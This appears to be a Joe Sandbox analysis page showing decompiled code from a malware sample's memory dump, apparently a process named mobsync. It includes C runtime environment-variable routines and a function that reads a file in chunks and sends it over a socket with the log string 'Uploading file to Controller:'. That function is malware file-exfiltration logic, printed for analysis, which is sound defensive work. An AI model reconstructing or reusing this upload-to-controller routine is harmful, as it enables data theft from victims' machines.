																									_t221 = _t305 - _t290;
																									__eflags = _t221;
																									do {
																										_t271 =  *_t290;
																										_t94 = _t271 + 1; // 0x5
																										_t284 = _t94;
																										do {
																											_t176 =  *_t271;
																											_t271 = _t271 + 1;
																											__eflags = _t176;
																										} while (_t176 != 0);
																										_t262 = _t271 - _t284;
																										_t95 = _t262 + 1; // 0x6
																										_v16 = _t95;
																										 *(_t221 + _t290) = L0043DFD9(_t262, _t95, 1);
																										L0043EE85(0);
																										_t323 = _t323 + 0xc;
																										__eflags =  *(_t221 + _t290);
																										if( *(_t221 + _t290) == 0) {
																											goto L102;
																										} else {
																											_t180 = E004405A6( *(_t221 + _t290), _v16,  *_t290);
																											_t323 = _t323 + 0xc;
																											__eflags = _t180;
																											if(_t180 != 0) {
																												L103:
																												_push(0);
																												_push(0);
																												_push(0);
																												_push(0);
																												_push(0);
																												E0043629A();
																												asm("int3");
																												_push(_t317);
																												_t318 = _t323;
																												_push(_t262);
																												_push(_t262);
																												_push(_t290);
																												_t291 = _v128;
																												__eflags = _t291;
																												if(_t291 != 0) {
																													_push(_t221);
																													_t223 = 0;
																													_t156 = _t291;
																													_t263 = 0;
																													_v20 = 0;
																													_push(_t305);
																													__eflags =  *_t291;
																													if( *_t291 != 0) {
																														do {
																															_t156 =  &(_t156[1]);
																															_t263 = _t263 + 1;
																															__eflags =  *_t156;
																														} while ( *_t156 != 0);
																													}
																													_t104 = _t263 + 1; // 0x2
																													_t306 = L0043DFD9(_t263, _t104, 4);
																													__eflags = _t306;
																													if(_t306 == 0) {
																														L119:
																														E0043E5DA(_t223, _t284, _t291, _t306);
																														goto L120;
																													} else {
																														__eflags =  *_t291 - _t223;
																														if( *_t291 == _t223) {
																															L117:
																															L0043EE85(_t223);
																															_t167 = _t306;
																															goto L118;
																														} else {
																															_t223 = _t306 - _t291;
																															__eflags = _t223;
																															do {
																																_t267 =  *_t291;
																																_t105 = _t267 + 2; // 0x6
																																_t284 = _t105;
																																do {
																																	_t168 =  *_t267;
																																	_t267 = _t267 + 2;
																																	__eflags = _t168 - _v20;
																																} while (_t168 != _v20);
																																_t107 = (_t267 - _t284 >> 1) + 1; // 0x3
																																_v24 = _t107;
																																 *(_t223 + _t291) = L0043DFD9(_t267 - _t284 >> 1, _t107, 2);
																																L0043EE85(0);
																																_t323 = _t323 + 0xc;
																																__eflags =  *(_t223 + _t291);
																																if( *(_t223 + _t291) == 0) {
																																	goto L119;
																																} else {
																																	_t173 = E00440264( *(_t223 + _t291), _v24,  *_t291);
																																	_t323 = _t323 + 0xc;
																																	__eflags = _t173;
																																	if(_t173 != 0) {
																																		L120:
																																		_push(0);
																																		_push(0);
																																		_push(0);
																																		_push(0);
																																		_push(0);
																																		E0043629A();
																																		asm("int3");
																																		_push(_t318);
																																		_push(_t223);
																																		_push(_t306);
																																		_push(_t291);
																																		_t292 =  *0x46b4d0; // 0x30e9c60
																																		_t307 = _t292;
																																		__eflags =  *_t292;
																																		if( *_t292 == 0) {
																																			L127:
																																			_t308 = _t307 - _t292;
																																			__eflags = _t308;
																																			_t310 =  ~(_t308 >> 2);
																																		} else {
																																			_t225 = _v8;
																																			do {
																																				_t163 = E00443141(_v12,  *_t307, _t225);
																																				_t323 = _t323 + 0xc;
																																				__eflags = _t163;
																																				if(_t163 != 0) {
																																					goto L126;
																																				} else {
																																					_t165 =  *((intOrPtr*)(_t225 +  *_t307));
																																					__eflags = _t165 - 0x3d;
																																					if(_t165 == 0x3d) {
																																						L129:
																																						_t310 = _t307 - _t292 >> 2;
																																					} else {
																																						__eflags = _t165;
																																						if(_t165 == 0) {
																																							goto L129;
																																						} else {
																																							goto L126;
																																						}
																																					}
																																				}
																																				goto L128;
																																				L126:
																																				_t307 =  &(_t307[1]);
																																				__eflags =  *_t307;
																																			} while ( *_t307 != 0);
																																			goto L127;
																																		}
																																		L128:
																																		return _t310;
																																	} else {
																																		goto L115;
																																	}
																																}
																																goto L130;
																																L115:
																																_t291 = _t291 + 4;
																																__eflags =  *_t291 - _t173;
																															} while ( *_t291 != _t173);
																															_t223 = 0;
																															__eflags = 0;
																															goto L117;
																														}
																													}
																												} else {
																													_t167 = 0;
																													L118:
																													return _t167;
																												}
																											} else {
																												goto L98;
																											}
																										}
																										goto L130;
																										L98:
																										_t290 = _t290 + 4;
																										__eflags =  *_t290 - _t180;
																									} while ( *_t290 != _t180);
																									goto L100;
																								}
																							}
																						} else {
																							_t175 = 0;
																							L101:
																							return _t175;
																						}
																					} else {
																						_t274 =  &(_t304[_v20 + 1]);
																						 *(_t274 - 2) = _t148;
																						asm("sbb eax, eax");
																						_t185 = SetEnvironmentVariableW(_t304,  !( ~(_v9 & 0x000000ff)) & _t274);
																						__eflags = _t185;
																						if(_t185 == 0) {
																							_t186 = L00439E14();
																							_t221 = _t221 | 0xffffffff;
																							__eflags = _t221;
																							 *_t186 = 0x2a;
																						}
																						goto L85;
																					}
																				}
																			}
																		}
																	}
																} else {
																	_t191 =  *0x46b4d0; // 0x30e9c60
																	__eflags = _a4 - _t221;
																	if(_a4 == _t221) {
																		L58:
																		__eflags = _t246;
																		if(_t246 != 0) {
																			goto L56;
																		} else {
																			__eflags = _t191;
																			if(_t191 != 0) {
																				L62:
																				 *0x46b4d4 = L0043DFD9(_t246, 1, 4);
																				L0043EE85(_t221);
																				_t322 = _t322 + 0xc;
																				goto L63;
																			} else {
																				 *0x46b4d0 = L0043DFD9(_t246, 1, 4);
																				L0043EE85(_t221);
																				_t322 = _t322 + 0xc;
																				__eflags =  *0x46b4d0 - _t221; // 0x30e9c60
																				if(__eflags == 0) {
																					goto L55;
																				} else {
																					_t302 =  *0x46b4d4; // 0x30fe808
																					__eflags = _t302;
																					if(_t302 != 0) {
																						goto L64;
																					} else {
																						goto L62;
																					}
																				}
																			}
																		}
																	} else {
																		__eflags = _t191;
																		if(_t191 == 0) {
																			goto L58;
																		} else {
																			_t196 = L0043C07A(_t221);
																			__eflags = _t196;
																			if(_t196 != 0) {
																				L63:
																				_t302 =  *0x46b4d4; // 0x30fe808
																				__eflags = _t302;
																				if(_t302 == 0) {
																					L55:
																					_t221 = _t220 | 0xffffffff;
																					__eflags = _t221;
																					L56:
																					L0043EE85(_t288);
																					_t136 = _t221;
																					goto L57;
																				} else {
																					goto L64;
																				}
																			} else {
																				goto L54;
																			}
																		}
																	}
																}
															}
														}
													} else {
														_t197 = L00439E14();
														 *_t197 = 0x16;
														_t136 = _t197 | 0xffffffff;
														L57:
														return _t136;
													}
												} else {
													_t280 = _v16 + 1 + _t300 - _a4;
													asm("sbb eax, eax");
													 *(_t280 - 1) = _t218;
													_t204 = SetEnvironmentVariableA(_t300,  !( ~(_v5 & 0x000000ff)) & _t280);
													__eflags = _t204;
													if(_t204 == 0) {
														_t205 = L00439E14();
														_t218 = _t218 | 0xffffffff;
														__eflags = _t218;
														 *_t205 = 0x2a;
													}
													goto L42;
												}
											}
										}
									}
								}
							} else {
								__eflags = _a8;
								if(_a8 == 0) {
									L14:
									__eflags = _t120;
									if(_t120 == 0) {
										 *0x46b4d0 = L0043DFD9(_t231, 1, 4);
										L0043EE85(_t218);
										_t298 =  *0x46b4d0; // 0x30e9c60
										_t320 = _t320 + 0xc;
										__eflags = _t298;
										if(_t298 == 0) {
											goto L11;
										} else {
											__eflags =  *0x46b4d4 - _t218; // 0x30fe808
											if(__eflags != 0) {
												goto L20;
											} else {
												 *0x46b4d4 = L0043DFD9(_t231, 1, 4);
												L0043EE85(_t218);
												_t320 = _t320 + 0xc;
												__eflags =  *0x46b4d4 - _t218; // 0x30fe808
												if(__eflags == 0) {
													goto L11;
												} else {
													goto L19;
												}
											}
										}
									} else {
										_t218 = 0;
										goto L12;
									}
								} else {
									__eflags =  *0x46b4d4 - _t218; // 0x30fe808
									if(__eflags == 0) {
										goto L14;
									} else {
										_t214 = L0043C075(0);
										__eflags = _t214;
										if(_t214 != 0) {
											L19:
											_t298 =  *0x46b4d0; // 0x30e9c60
											L20:
											__eflags = _t298;
											if(_t298 == 0) {
												L11:
												_t218 = _t217 | 0xffffffff;
												__eflags = _t218;
												L12:
												L0043EE85(_t286);
												_t119 = _t218;
												goto L13;
											} else {
												goto L21;
											}
										} else {
											goto L10;
										}
									}
								}
							}
						}
					}
				} else {
					_t215 = L00439E14();
					 *_t215 = 0x16;
					_t119 = _t215 | 0xffffffff;
					L13:
					return _t119;
				}
				L130:
			}

0x00446266
0x0044626b
0x00446282
0x00446284
0x00446289
0x0044628d
0x0044628e
0x00446290
0x004462e0
0x004462e5
0x00000000
0x00446292
0x00446292
0x00446294
0x00000000
0x00446296
0x00446296
0x0044629a
0x004462a0
0x004462a3
0x004462a6
0x004462ac
0x004462af
0x004462b4
0x004462b6
0x004462b9
0x004462ba
0x004462ba
0x004462c0
0x004462c2
0x004462c4
0x00446358
0x0044635b
0x0044635d
0x0044635f
0x00446360
0x00446361
0x00446366
0x0044636b
0x0044636d
0x004463b7
0x004463b7
0x004463ba
0x00000000
0x004463c0
0x004463c0
0x004463c2
0x004463c5
0x004463c5
0x004463c8
0x004463ca
0x00000000
0x004463d0
0x004463d0
0x004463d6
0x00000000
0x004463dc
0x004463dc
0x004463de
0x004463e6
0x004463e8
0x004463ed
0x004463f0
0x004463f2
0x00000000
0x004463f8
0x004463f8
0x004463fb
0x004463fd
0x00446400
0x00446403
0x00000000
0x00446403
0x004463f2
0x004463d6
0x004463ca
0x0044636f
0x0044636f
0x00446371
0x00000000
0x00446373
0x00446376
0x0044637c
0x0044637f
0x00446382
0x00446396
0x00446396
0x00446399
0x00000000
0x00000000
0x00446392
0x00446395
0x00446395
0x00446395
0x0044639b
0x0044639d
0x004463a5
0x004463a7
0x004463ac
0x004463af
0x004463b1
0x004463b3
0x00446407
0x00446407
0x00446407
0x00446384
0x00446384
0x00446387
0x00446389
0x00446389
0x0044640d
0x00446410
0x00000000
0x00446416
0x00446416
0x00446418
0x0044641b
0x0044641b
0x0044641d
0x0044641e
0x0044641e
0x0044642a
0x00446432
0x00446435
0x00446436
0x00446438
0x00446481
0x00446482
0x00000000
0x0044643a
0x00446441
0x00446446
0x00446449
0x0044644b
0x0044648d
0x0044648e
0x0044648f
0x00446490
0x00446491
0x00446492
0x00446497
0x0044649b
0x0044649d
0x004464a0
0x004464a1
0x004464a4
0x004464a6
0x004464b8
0x004464b9
0x004464ba
0x004464bd
0x004464bf
0x004464c4
0x004464c8
0x004464c9
0x004464cb
0x0044651c
0x00446521
0x00000000
0x004464cd
0x004464cd
0x004464cf
0x00000000
0x004464d1
0x004464d1
0x004464d7
0x004464d9
0x004464dd
0x004464e0
0x004464e3
0x004464e9
0x004464eb
0x004464ec
0x004464f2
0x004464f5
0x004464f7
0x004464f7
0x004464fd
0x004464ff
0x0044658c
0x00446597
0x0044659a
0x0044659f
0x004465a4
0x004465a6
0x004465f0
0x004465f0
0x004465f3
0x00000000
0x004465f9
0x004465f9
0x004465fb
0x004465fe
0x004465fe
0x00446601
0x00446603
0x00000000
0x00446609
0x00446609
0x0044660f
0x00000000
0x00446615
0x00446615
0x00446617
0x0044661f
0x00446621
0x00446626
0x00446629
0x0044662b
0x00000000
0x00446631
0x00446631
0x00446634
0x00446636
0x00446639
0x0044663c
0x00000000
0x0044663c
0x0044662b
0x0044660f
0x00446603
0x004465a8
0x004465a8
0x004465aa
0x00000000
0x004465ac
0x004465af
0x004465b5
0x004465b8
0x004465bb
0x004465cf
0x004465cf
0x004465d2
0x00000000
0x00000000
0x004465cb
0x004465ce
0x004465ce
0x004465ce
0x004465d4
0x004465d6
0x004465de
0x004465e0
0x004465e5
0x004465e8
0x004465ea
0x004465ec
0x00446640
0x00446640
0x00446640
0x004465bd
0x004465bd
0x004465c0
0x004465c2
0x004465c2
0x00446646
0x00446649
0x00000000
0x0044664f
0x0044664f
0x00446651
0x00446651
0x00446654
0x00446654
0x00446657
0x0044665a
0x0044665a
0x00446665
0x00446669
0x00446671
0x00446674
0x00446675
0x00446677
0x004466be
0x004466bf
0x00000000
0x00446679
0x00446681
0x00446686
0x00446689
0x0044668b
0x004466ca
0x004466cb
0x004466cc
0x004466cd
0x004466ce
0x004466cf
0x004466d4
0x004466d7
0x004466d8
0x004466db
0x004466dc
0x004466df
0x004466e1
0x004466ea
0x004466ec
0x004466ee
0x004466f0
0x004466f2
0x004466f2
0x004466f5
0x004466f6
0x004466f6
0x004466f2
0x004466fc
0x00446707
0x0044670a
0x0044670b
0x0044670d
0x00446774
0x00446774
0x00000000
0x0044670f
0x0044670f
0x00446712
0x00446764
0x00446766
0x0044676c
0x00000000
0x00446714
0x00446714
0x00446717
0x00446717
0x00446719
0x00446719
0x0044671b
0x0044671b
0x0044671e
0x0044671e
0x00446720
0x00446721
0x00446721
0x00446725
0x00446729
0x0044672d
0x00446737
0x0044673a
0x0044673f
0x00446742
0x00446746
0x00000000
0x00446748
0x00446750
0x00446755
0x00446758
0x0044675a
0x00446779
0x0044677b
0x0044677c
0x0044677d
0x0044677e
0x0044677f
0x00446780
0x00446785
0x00446788
0x00446789
0x0044678b
0x0044678c
0x0044678d
0x0044678e
0x00446791
0x00446793
0x0044679c
0x0044679d
0x0044679f
0x004467a1
0x004467a3
0x004467a6
0x004467a7
0x004467a9
0x004467ab
0x004467ab
0x004467ae
0x004467af
0x004467af
0x004467ab
0x004467b3
0x004467be
0x004467c2
0x004467c4
0x00446832
0x00446832
0x00000000
0x004467c6
0x004467c6
0x004467c8
0x00446822
0x00446823
0x00446829
0x00000000
0x004467ca
0x004467cc
0x004467cc
0x004467ce
0x004467ce
0x004467d0
0x004467d0
0x004467d3
0x004467d3
0x004467d6
0x004467d9
0x004467d9
0x004467e5
0x004467e9
0x004467f1
0x004467f7
0x004467fc
0x004467ff
0x00446803
0x00000000
0x00446805
0x0044680d
0x00446812
0x00446815
0x00446817
0x00446837
0x00446839
0x0044683a
0x0044683b
0x0044683c
0x0044683d
0x0044683e
0x00446843
0x00446846
0x00446849
0x0044684a
0x0044684b
0x0044684c
0x00446852
0x00446854
0x00446857
0x00446883
0x00446883
0x00446883
0x00446888
0x00446859
0x00446859
0x0044685c
0x00446862
0x00446867
0x0044686a
0x0044686c
0x00000000
0x0044686e
0x00446870
0x00446873
0x00446875
0x00446891
0x00446893
0x00446877
0x00446877
0x00446879
0x00000000
0x00000000
0x00000000
0x00000000
0x00446879
0x00446875
0x00000000
0x0044687b
0x0044687b
0x0044687e
0x0044687e
0x00000000
0x0044685c
0x0044688a
0x00446890
0x00000000
0x00000000
0x00000000
0x00446817
0x00000000
0x00446819
0x00446819
0x0044681c
0x0044681c
0x00446820
0x00446820
0x00000000
0x00446820
0x004467c8
0x00446795
0x00446795
0x0044682d
0x00446831
0x00446831
0x00000000
0x00000000
0x00000000
0x0044675a
0x00000000
0x0044675c
0x0044675c
0x0044675f
0x0044675f
0x00000000
0x00446763
0x00446712
0x004466e3
0x004466e3
0x0044676f
0x00446773
0x00446773
0x0044668d
0x00446691
0x00446694
0x0044669e
0x004466a6
0x004466ac
0x004466ae
0x004466b0
0x004466b5
0x004466b5
0x004466b8
0x004466b8
0x00000000
0x004466ae
0x0044668b
0x00446677
0x00446649
0x004465aa
0x00446505
0x00446505
0x0044650a
0x0044650d
0x0044653a
0x0044653a
0x0044653c
0x00000000
0x0044653e
0x0044653e
0x00446540
0x0044656b
0x00446575
0x0044657a
0x0044657f
0x00000000
0x00446542
0x0044654c
0x00446551
0x00446556
0x00446559
0x0044655f
0x00000000
0x00446561
0x00446561
0x00446567
0x00446569
0x00000000
0x00000000
0x00000000
0x00000000
0x00446569
0x0044655f
0x00446540
0x0044650f
0x0044650f
0x00446511
0x00000000
0x00446513
0x00446513
0x00446518
0x0044651a
0x00446582
0x00446582
0x00446588
0x0044658a
0x00446527
0x00446527
0x00446527
0x0044652a
0x0044652b
0x00446532
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0044651a
0x00446511
0x0044650d
0x004464ff
0x004464cf
0x004464a8
0x004464a8
0x004464ad
0x004464b3
0x00446535
0x00446539
0x00446539
0x0044644d
0x00446456
0x0044645e
0x00446462
0x00446469
0x0044646f
0x00446471
0x00446473
0x00446478
0x00446478
0x0044647b
0x0044647b
0x00000000
0x00446471
0x0044644b
0x00446438
0x00446410
0x00446371
0x004462ca
0x004462ca
0x004462cd
0x004462fe
0x004462fe
0x00446300
0x00446310
0x00446315
0x0044631a
0x00446320
0x00446323
0x00446325
0x00000000
0x00446327
0x00446327
0x0044632d
0x00000000
0x0044632f
0x00446339
0x0044633e
0x00446343
0x00446346
0x0044634c
0x00000000
0x00000000
0x00000000
0x00000000
0x0044634c
0x0044632d
0x00446302
0x00446302
0x00000000
0x00446302
0x004462cf
0x004462cf
0x004462d5
0x00000000
0x004462d7
0x004462d7
0x004462dc
0x004462de
0x0044634e
0x0044634e
0x00446354
0x00446354
0x00446356
0x004462eb
0x004462eb
0x004462eb
0x004462ee
0x004462ef
0x004462f6
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004462de
0x004462d5
0x004462cd
0x004462c4
0x00446294
0x0044626d
0x0044626d
0x00446272
0x00446278
0x004462f9
0x004462fd
0x004462fd
0x00000000

APIs

___from_strstr_to_strchr.LIBCMT ref: 00446284
_free.LIBCMT ref: 004462EF
_free.LIBCMT ref: 00446315
_free.LIBCMT ref: 0044633E
_free.LIBCMT ref: 00446376
_free.LIBCMT ref: 004463A7
_free.LIBCMT ref: 004463E8
SetEnvironmentVariableA.KERNEL32(00000000,00000000), ref: 00446469
_free.LIBCMT ref: 00446482
_wcschr.LIBVCRUNTIME ref: 004464BF
_free.LIBCMT ref: 0044652B
_free.LIBCMT ref: 00446551
_free.LIBCMT ref: 0044657A
_free.LIBCMT ref: 004465AF
_free.LIBCMT ref: 004465E0
_free.LIBCMT ref: 00446621
SetEnvironmentVariableW.KERNEL32(00000000,?,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004466A6
_free.LIBCMT ref: 004466BF

Memory Dump Source

Source File: 00000008.00000002.491601903.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.492378547.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_mobsync.jbxd

Yara matches

Similarity

API ID: _free$EnvironmentVariable$___from_strstr_to_strchr_wcschr
String ID:
API String ID: 2719235668-0
Opcode ID: 0396f40de46c15702d6b6467e7c2b379eb71c483402df27b54df7b77d9a13a54
Instruction ID: b3a0fccac4172db87641eb1f9af5537d347888dfd9dcec10cf93ff69a179e89b
Opcode Fuzzy Hash: 0396f40de46c15702d6b6467e7c2b379eb71c483402df27b54df7b77d9a13a54
Instruction Fuzzy Hash: 17D127719003007BFB20AF75984266B7BA4EF07718F06016FE945D7382EB799901CB9E

Uniqueness

Uniqueness Score: -1.00%

Function 00406455, Relevance: 26.6, APIs: 9, Strings: 6, Instructions: 345
fileCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00406455(intOrPtr __ecx, void* __edx, WCHAR* _a4, char _a8, char _a32, char _a56) {
				void* _v12;
				union _LARGE_INTEGER _v16;
				struct _OVERLAPPED* _v20;
				long _v24;
				long _v28;
				intOrPtr _v32;
				long _v36;
				struct _OVERLAPPED* _v40;
				union _LARGE_INTEGER* _v44;
				signed int _v48;
				signed int _v52;
				struct %anon52 _v64;
				intOrPtr _v68;
				struct %anon52 _v80;
				union _LARGE_INTEGER _v84;
				intOrPtr _v88;
				char _v112;
				char _v136;
				char _v160;
				char _v184;
				char _v208;
				char _v232;
				char _v256;
				char _v280;
				char _v304;
				char _v328;
				char _v352;
				char _v376;
				char _v400;
				char _v424;
				char _v448;
				char _v472;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct %anon52 _t117;
				void* _t119;
				void* _t126;
				long _t136;
				void* _t137;
				signed int _t138;
				struct _OVERLAPPED* _t145;
				signed int _t148;
				void* _t154;
				void* _t156;
				void* _t157;
				void* _t173;
				long _t198;
				signed int _t203;
				void* _t216;
				union _LARGE_INTEGER _t280;
				intOrPtr _t281;
				union _LARGE_INTEGER* _t295;
				void* _t297;
				void* _t301;
				void* _t302;
				void* _t303;
				void* _t304;
				void* _t305;

				_t278 = __edx;
				_v68 = __ecx;
				E00404955(__ecx);
				_t302 = _t301 - 0x10;
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t299 = _v68;
				E004049D2(__edx);
				_v28 = 0x186a0;
				_v20 = 0;
				_t297 = CreateFileW(_a4, 0x80000000, 1, 0, 3, 0x80, 0);
				_t310 = _t297 - 0xffffffff;
				if(_t297 != 0xffffffff) {
					_v80.LowPart = 0;
					_v80.HighPart = 0;
					__imp__GetFileSizeEx(_t297,  &_v80);
					_t203 = _v80.HighPart;
					_t117 = _v80;
					_v48 = _t203;
					_v32 = _t203;
					_v52 = _t117;
					_v16.LowPart = _t117;
					E0040425F(0,  &_v112, _a4);
					_t119 = L00416C93( &_v136,  &_v112);
					_t303 = _t302 - 0x18;
					_t280 = "Uploading file to Controller: ";
					E004075C4(0, _t303, _t280, _t297, __eflags, _t119);
					_t304 = _t303 - 0x14;
					E00402064(0, _t304, "[Info]");
					E004165D8(0, _t297);
					_t305 = _t304 + 0x30;
					L00401FA7();
					L00401ED0();
					_v36 = 1;
					_v40 = 0;
					_t126 = E004500F0(_v52, _v48, 0x186a0, 0);
					_t210 = _t280;
					asm("xorps xmm0, xmm0");
					_v88 = _t126 + 1;
					asm("adc ecx, ebx");
					asm("movlpd [ebp-0x3c], xmm0");
					_v84.LowPart = _t280;
					__eflags = _v48;
					if(__eflags < 0) {
						L17:
						CloseHandle(_t297);
						L00404DD5(_t299);
						_t198 = 1;
					} else {
						if(__eflags > 0) {
							L5:
							_v44 = _v64.HighPart.LowPart;
							_v64.HighPart.LowPart = _v64;
							_t136 = 0x186a0;
							goto L6;
							do {
								do {
									L6:
									_t281 = _v32;
									__eflags = _v20 - _t281;
									if(__eflags >= 0) {
										_t210 = _v16.LowPart;
										if(__eflags > 0) {
											L9:
											_t136 = _t210;
											_v20 = _t281;
											_v28 = _t136;
										} else {
											__eflags = _t136 - _t210;
											if(__eflags > 0) {
												goto L9;
											}
										}
									}
									_push(_t136);
									_t137 = L0042EE1E(_t210, _t281, _t299, __eflags);
									_push(0);
									_v12 = _t137;
									_v24 = 0;
									_t138 = SetFilePointerEx(_t297, _v64.HighPart.LowPart, _v44, 0);
									__eflags = _t138;
									if(_t138 == 0) {
										_t306 = _t305 - 0x18;
										_t216 = _t305 - 0x18;
										_push("SetFilePointerEx error");
										goto L23;
									} else {
										_t148 = ReadFile(_t297, _v12, _v28,  &_v24, 0);
										__eflags = _t148;
										if(_t148 == 0) {
											_t306 = _t305 - 0x18;
											_t216 = _t305 - 0x18;
											_push("ReadFile error");
											L23:
											E00402064(0, _t216);
											E00402064(0, _t306 - 0x18, "[ERROR]");
											E004165D8(0, _t297);
											L0042EE27(_v12);
											CloseHandle(_t297);
											goto L24;
										} else {
											__eflags = _v24;
											if(__eflags == 0) {
												L0042EE27(_v12);
												CloseHandle(_t297);
												L00404DD5(_t299);
												_t145 = 1;
												goto L25;
											} else {
												E0040425F(0,  &_v112, _a4);
												_t154 = E0040208B(0,  &_v472, _t281, __eflags, _v12, _v24);
												_t305 = _t305 - 0x18;
												_t156 = L00416BB8(0x46c238,  &_v448, _v88, _v84);
												_t157 = L00416BB8(0x46c238,  &_v424, _v36, _v40);
												L00402EFD(_t305, L00402F73(0x46c238,  &_v136, L00402F73(0x46c238,  &_v160, L00402F73(0x46c238,  &_v184, L00402EFD( &_v208, L00402F73(0x46c238,  &_v232, L00402EFD( &_v256, L00402F73(0x46c238,  &_v280, L00402F73(0x46c238,  &_v304, L00402F73(0x46c238,  &_v328, L00402F73(0x46c238,  &_v352, L00402F73(0x46c238,  &_v376, L00416CF4(0x46c238,  &_v400,  &_v112), __eflags, 0x46c238), __eflags,  &_a8), __eflags, 0x46c238), __eflags,  &_a32), __eflags, 0x46c238), _t157), __eflags, 0x46c238), _t156), __eflags, 0x46c238), __eflags,  &_a56), __eflags, 0x46c238), _t154);
												_t299 = _v68;
												_push(0x52);
												_t173 = E00404A6E(0x46c238, _v68, _t171, __eflags);
												__eflags = _t173 - 0xffffffff;
												L00401FA7();
												L00401FA7();
												L00401FA7();
												L00401FA7();
												L00401FA7();
												L00401FA7();
												L00401FA7();
												L00401FA7();
												L00401FA7();
												L00401FA7();
												L00401FA7();
												L00401FA7();
												L00401FA7();
												L00401FA7();
												L00401FA7();
												L00401ED0();
												__eflags = 0x46c200 | _t173 == 0xffffffff;
												if((0x46c200 | _t173 == 0xffffffff) != 0) {
													L00404DD5(_t299);
													CloseHandle(_t297);
													L0042EE27(_v12);
													_t198 = 0;
												} else {
													goto L14;
												}
											}
										}
									}
									goto L18;
									L14:
									L0042EE27(_v12);
									_t136 = _v28;
									_v16.LowPart = _v16 - _t136;
									_t295 = _v44;
									asm("sbb ecx, [ebp-0x10]"); // 0x406a55
									_v36 = _v36 + 1;
									_push(0);
									_pop(0);
									asm("adc [ebp-0x24], ebx");
									_t210 = _v64.HighPart.LowPart + _t136;
									_v64.HighPart = _t210;
									asm("adc edx, [ebp-0x10]"); // 0x406a55
									_v44 = _t295;
									__eflags = _t295 - _v48;
								} while (__eflags < 0);
								if(__eflags > 0) {
									goto L17;
								} else {
									goto L16;
								}
								goto L18;
								L16:
								__eflags = _t210 - _v52;
							} while (_t210 < _v52);
							goto L17;
						} else {
							__eflags = _v52;
							if(_v52 <= 0) {
								goto L17;
							} else {
								goto L5;
							}
						}
					}
				} else {
					E004020CC(0, _t302 - 0x18, _t278, _t310,  &_a8);
					_push(0x53);
					E00404A6E(0, 0x46c2e8, _t278, _t310);
					L24:
					L00404DD5(_t299);
					_t145 = 0;
					L25:
					_t198 = _t145;
				}
				L18:
				L00401FA7();
				L00401FA7();
				L00401FA7();
				return _t198;
			}

0x00406455
0x00406461
0x00406464
0x00406469
0x00406473
0x00406474
0x00406475
0x00406476
0x00406477
0x0040647c
0x00406483
0x0040649d
0x004064a6
0x004064a8
0x004064ab
0x004064cf
0x004064d4
0x004064d7
0x004064dd
0x004064e0
0x004064e6
0x004064e9
0x004064ef
0x004064f2
0x004064f5
0x00406503
0x00406508
0x0040650b
0x00406513
0x00406518
0x00406522
0x00406527
0x0040652c
0x00406535
0x0040653d
0x00406548
0x00406553
0x00406559
0x00406561
0x00406563
0x00406566
0x00406569
0x0040656b
0x00406570
0x00406573
0x00406576
0x00406817
0x00406818
0x00406820
0x00406825
0x0040657c
0x0040657c
0x00406587
0x0040658a
0x00406590
0x00406593
0x00406593
0x00406598
0x00406598
0x00406598
0x00406598
0x0040659b
0x0040659e
0x004065a0
0x004065a3
0x004065a9
0x004065a9
0x004065ab
0x004065ae
0x004065a5
0x004065a5
0x004065a7
0x00000000
0x00000000
0x004065a7
0x004065a3
0x004065b1
0x004065b2
0x004065b8
0x004065bd
0x004065c3
0x004065c7
0x004065cd
0x004065cf
0x0040688d
0x00406890
0x00406892
0x00000000
0x004065d5
0x004065e2
0x004065e8
0x004065ea
0x00406881
0x00406884
0x00406886
0x00406897
0x00406897
0x004068a6
0x004068ab
0x004068b3
0x004068bc
0x00000000
0x004065f0
0x004065f0
0x004065f4
0x00406868
0x0040686f
0x00406877
0x0040687e
0x00000000
0x004065fa
0x00406600
0x00406611
0x00406616
0x00406633
0x00406648
0x00406707
0x0040670c
0x00406710
0x00406714
0x00406719
0x00406725
0x00406730
0x0040673b
0x00406746
0x00406751
0x0040675c
0x00406767
0x00406772
0x0040677d
0x00406788
0x00406793
0x0040679e
0x004067a9
0x004067b4
0x004067bf
0x004067c7
0x004067cc
0x004067ce
0x0040684c
0x00406852
0x0040685b
0x00406861
0x00000000
0x00000000
0x00000000
0x004067ce
0x004065f4
0x004065ea
0x00000000
0x004067d0
0x004067d3
0x004067d8
0x004067db
0x004067de
0x004067e5
0x004067e8
0x004067ec
0x004067f4
0x004067f5
0x004067f8
0x004067fa
0x004067fd
0x00406800
0x00406803
0x00406803
0x0040680c
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040680e
0x0040680e
0x0040680e
0x00000000
0x0040657e
0x0040657e
0x00406581
0x00000000
0x00000000
0x00000000
0x00000000
0x00406581
0x0040657c
0x004064ad
0x004064b6
0x004064bb
0x004064c2
0x004068c2
0x004068c4
0x004068c9
0x004068cb
0x004068cb
0x004068cb
0x00406827
0x0040682a
0x00406832
0x0040683a
0x00406847

APIs

Part of subcall function 004049D2: connect.WS2_32(?,?,00000010), ref: 004049ED

CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 004064A0
GetFileSizeEx.KERNEL32(00000000,?), ref: 004064D7
__aulldiv.LIBCMT ref: 00406559
SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000,?,?,000186A0,00000000), ref: 004065C7
ReadFile.KERNEL32(00000000,?,000186A0,?,00000000), ref: 004065E2

Part of subcall function 00404A6E: send.WS2_32 ref: 00404AE2

Part of subcall function 00404DD5: closesocket.WS2_32(?), ref: 00404DDB

Strings

Uploading file to Controller: , xrefs: 0040650B
Uj@, xrefs: 004067E5, 004067FD
[ERROR], xrefs: 004068A1
ReadFile error, xrefs: 00406886
SetFilePointerEx error, xrefs: 00406892
[Info], xrefs: 0040651D

Memory Dump Source

Source File: 00000008.00000002.491601903.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.492378547.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_mobsync.jbxd

Yara matches

